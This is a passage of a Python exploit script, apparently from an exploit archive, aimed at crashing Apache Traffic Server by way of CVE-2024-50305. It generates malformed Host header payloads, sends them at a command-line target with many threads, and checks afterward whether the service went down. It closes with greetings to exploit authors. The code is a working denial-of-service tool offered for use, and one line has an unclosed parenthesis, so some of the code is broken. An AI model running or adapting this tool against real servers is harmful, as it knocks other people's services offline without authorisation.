result.crash_confidence = self._evaluate_crash_confidence(result, {})
except Exception as e:
result.error = str(e)
result.response_time = time.monotonic() - start_time
return result
class PayloadGenerator:
"""Generates malicious Host values"""
BASE_PAYLOADS = [
":", "::", "[::1]", "", "\0",
"localhost:8080:extra", "host\x00injection",
]
SPECIAL_CHARS = list(string.punctuation + string.whitespace)
@classmethod
def generate(cls, count: int = 30) -> List[str]:
"""Generates a list of payloads"""
count = max(10, min(count, 100))
payloads = set(cls.BASE_PAYLOADS)
for length in [100, 500, 1000, 2000, 5000]:
if len(payloads) < count:
payloads.add('A' * length)
payloads.add('B' * length)
random_needed = count - len(payloads)
if random_needed > 0:
for _ in range(random_needed):
length = random.randint(5, 50)
random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length))
payloads.add(random_payload)
unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
payloads.update(unicode_samples[:max(0, count - len(payloads))])
return list(payloads)[:count]
class StatisticsCollector:
"""Thread-safe statistics collection with memory control"""
def __init__(self, max_response_times: int = 1000):
self.lock = threading.Lock()
self.stats = Statistics()
self.max_response_times = max_response_times
self._response_times_sample = [] # Limited sample for analysis
def add_result(self, result: RequestResult):
"""Adds a result in a thread-safe manner"""
with self.lock:
self.stats.total_requests += 1
if result.crash_confidence == CrashConfidence.HIGH:
self.stats.crashes_high += 1
elif result.crash_confidence == CrashConfidence.MEDIUM:
self.stats.crashes_medium += 1
elif result.crash_confidence == CrashConfidence.LOW:
self.stats.crashes_low += 1
if result.error == "connection_refused":
self.stats.connection_refused += 1
elif result.connection_reset:
self.stats.connection_reset += 1
elif result.error:
self.stats.errors += 1
if result.timeout_occurred:
self.stats.timeouts += 1
if result.status_code is not None:
self.stats.successful += 1
self.stats.status_codes[result.status_code] += 1
if result.response_time > 0:
self.stats.response_time_sum += result.response_time
self.stats.response_time_count += 1
self.stats.response_time_min = min(self.stats.response_time_min, result.response_time)
self.stats.response_time_max = max(self.stats.response_time_max, result.response_time)
if len(self._response_times_sample) < self.max_response_times:
self._response_times_sample.append(result.response_time)
def get_stats(self) -> Statistics:
"""Gets a copy of the statistics"""
with self.lock:
stats_copy = Statistics(
total_requests=self.stats.total_requests,
crashes_high=self.stats.crashes_high,
crashes_medium=self.stats.crashes_medium,
crashes_low=self.stats.crashes_low,
timeouts=self.stats.timeouts,
connection_refused=self.stats.connection_refused,
connection_reset=self.stats.connection_reset,
successful=self.stats.successful,
errors=self.stats.errors,
status_codes=self.stats.status_codes.copy(),
response_time_sum=self.stats.response_time_sum,
response_time_count=self.stats.response_time_count,
response_time_min=self.stats.response_time_min,
response_time_max=self.stats.response_time_max
)
return stats_copy
def get_average_response_time(self) -> float:
"""Calculates average response time"""
if self.stats.response_time_count > 0:
return self.stats.response_time_sum / self.stats.response_time_count
return 0.0
class CVE202450305Exploit:
"""Main exploit class"""
def __init__(self, target: str, port: int = 80, threads: int = 5,
timeout: float = 5, prefer_ipv6: bool = False,
use_ssl: bool = False, rate_limit: float = 0.1):
if not 1 <= port <= 65535:
raise ValueError(f"Invalid port number: {port}")
if threads < 1 or threads > 100:
raise ValueError(f"Thread count must be between 1 and 100")
self.target = target
self.port = port
self.threads = threads
self.timeout = timeout
self.prefer_ipv6 = prefer_ipv6
self.use_ssl = use_ssl
self.rate_limit = rate_limit
self.resolver = TargetResolver(prefer_ipv6)
self.checker = ServiceChecker(timeout)
self.sender = RequestSender(timeout)
self.stats = StatisticsCollector()
self.target_ip = None
self.target_family = None
self.baseline_state = ServiceState.UNKNOWN
self.baseline_time = 1.0 # Default value
self.baseline_status = None
self.is_ip_target = False
def initialize(self) -> bool:
"""Initializes exploit and resolves target"""
logger.info(f"Initializing exploit for target {self.target}:{self.port}")
resolved = self.resolver.resolve(self.target, self.port)
if not resolved:
logger.error("Failed to resolve target")
return False
self.target_ip, _, self.target_family = resolved
try:
ipaddress.ip_address(self.target)
self.is_ip_target = True
except ValueError:
self.is_ip_target = False
logger.info(f"Target resolved: {self.target_ip} "
f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
logger.info("Performing baseline service check...")
state, resp_time, status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
self.baseline_state = state
if resp_time > 0:
self.baseline_time = resp_time
self.baseline_status = status
if state == ServiceState.UP:
logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.SLOW:
logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.UNKNOWN:
logger.warning(f" Service status is UNKNOWN")
return True
else:
logger.error(f" Service is NOT running: {state.value}")
return False
def _process_payload_chunk(self, payloads: List[str], iteration: int,
chunk_idx: int) -> List[RequestResult]:
"""Processes a subset of payloads"""
results = []
with ThreadPoolExecutor(max_workers=self.threads) as executor:
future_to_payload = {}
for payload in payloads:
if self.rate_limit > 0:
time.sleep(self.rate_limit)
future = executor.submit(
self.sender.send,
self.target_ip,
self.port,
self.target_family,
payload,
self.baseline_time
)
future_to_payload[future] = payload
for future in as_completed(future_to_payload):
try:
result = future.result(timeout=self.timeout + 2)
results.append(result)
self.stats.add_result(result)
if result.crash_confidence == CrashConfidence.HIGH:
logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...")
elif result.crash_confidence == CrashConfidence.MEDIUM:
logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...")
elif result.connection_reset:
logger.debug(f" Connection reset: {repr(result.payload)[:50]}...")
elif result.timeout_occurred:
logger.debug(f" Timeout: {repr(result.payload)[:50]}...")
except Exception as e:
logger.error(f"Error processing result: {e}")
return results
def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
"""
Executes the attack
Returns:
(Exploit_Success, Statistics)
"""
logger.info("=" * 60)
logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
logger.info("=" * 60)
logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
logger.info(f"Rate limit: {self.rate_limit}s")
logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
logger.info("=" * 60)
payloads = PayloadGenerator.generate(payload_count)
logger.info(f" Generated {len(payloads)} malicious Host values")
all_results = []
for iteration in range(iterations):
logger.info(f"\n Iteration {iteration + 1}/{iterations}")
chunk_size = max(1, len(payloads)
chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
for chunk_idx, chunk in enumerate(chunks):
logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}")
results = self._process_payload_chunk(chunk, iteration, chunk_idx)
all_results.extend(results)
stats = self.stats.get_stats()
logger.info(f" Progress: {stats.total_requests}/{iterations * len(payloads)} "
f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
if chunk_idx < len(chunks) - 1:
time.sleep(1)
final_stats = self.stats.get_stats()
avg_time = self.stats.get_average_response_time()
logger.info("\n" + "=" * 60)
logger.info(" Final Statistics:")
logger.info(f" Total Requests: {final_stats.total_requests}")
logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
logger.info(f" Timeouts: {final_stats.timeouts}")
logger.info(f" Connection resets: {final_stats.connection_reset}")
logger.info(f" Connection refused: {final_stats.connection_refused}")
logger.info(f" Successful responses: {final_stats.successful}")
if final_stats.status_codes:
logger.info(f" Status Codes: {dict(final_stats.status_codes)}")
if final_stats.response_time_count > 0:
logger.info(f" Response Time - Avg: {avg_time:.3f}s")
logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s")
logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s")
logger.info("=" * 60)
logger.info("\n Verifying exploit success...")
time.sleep(3)
post_state, post_time, post_status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
success = False
reasons = []
if final_stats.crashes_high > 0:
reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
success = True
if final_stats.crashes_medium > 3:
reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
success = True
if self.baseline_state == ServiceState.UP:
if post_state == ServiceState.DOWN:
reasons.append("Service stopped after attack")
success = True
elif post_state == ServiceState.SLOW and self.baseline_time > 0:
slowdown_ratio = post_time / self.baseline_time
if slowdown_ratio > 3:
reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
success = True
if success:
logger.info("Exploit Successful!")
for reason in reasons:
logger.info(f" • {reason}")
return True, final_stats
else:
logger.info(" Exploit Failed")
if reasons:
logger.info(f" ({', '.join(reasons)})")
else:
logger.info(" No evidence of vulnerability found")
return False, final_stats
def main():
"""Main function"""
parser = argparse.ArgumentParser(
description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("target", help="Target address (IP or domain)")
parser.add_argument("-p", "--port", type=int, default=80,
help="Target port (1-65535, default: 80)")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Thread count (1-100, default: 5)")
parser.add_argument("--timeout", type=float, default=5,
help="Connection timeout in seconds (default: 5)")
parser.add_argument("--ipv6", action="store_true",
help="Prefer IPv6")
parser.add_argument("--ssl", action="store_true",
help="Use HTTPS/SSL")
parser.add_argument("--rate-limit", type=float, default=0.05,
help="Delay between requests in seconds (default: 0.05)")
parser.add_argument("-c", "--payloads", type=int, default=30,
help="Number of payloads to test (10-100, default: 30)")
parser.add_argument("-i", "--iterations", type=int, default=3,
help="Number of iterations (default: 3)")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show detailed information")
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
try:
exploit = CVE202450305Exploit(
target=args.target,
port=args.port,
threads=args.threads,
timeout=args.timeout,
prefer_ipv6=args.ipv6,
use_ssl=args.ssl,
rate_limit=args.rate_limit
)
if not exploit.initialize():
sys.exit(2)
success, stats = exploit.run(
payload_count=args.payloads,
iterations=args.iterations
)
sys.exit(0 if success else 1)
except KeyboardInterrupt:
logger.info("\nAttack stopped by user")
sys.exit(2)
except ValueError as e:
logger.error(f"Input Error: {e}")
sys.exit(2)
except Exception as e:
logger.error(f"Unexpected Error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(2)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================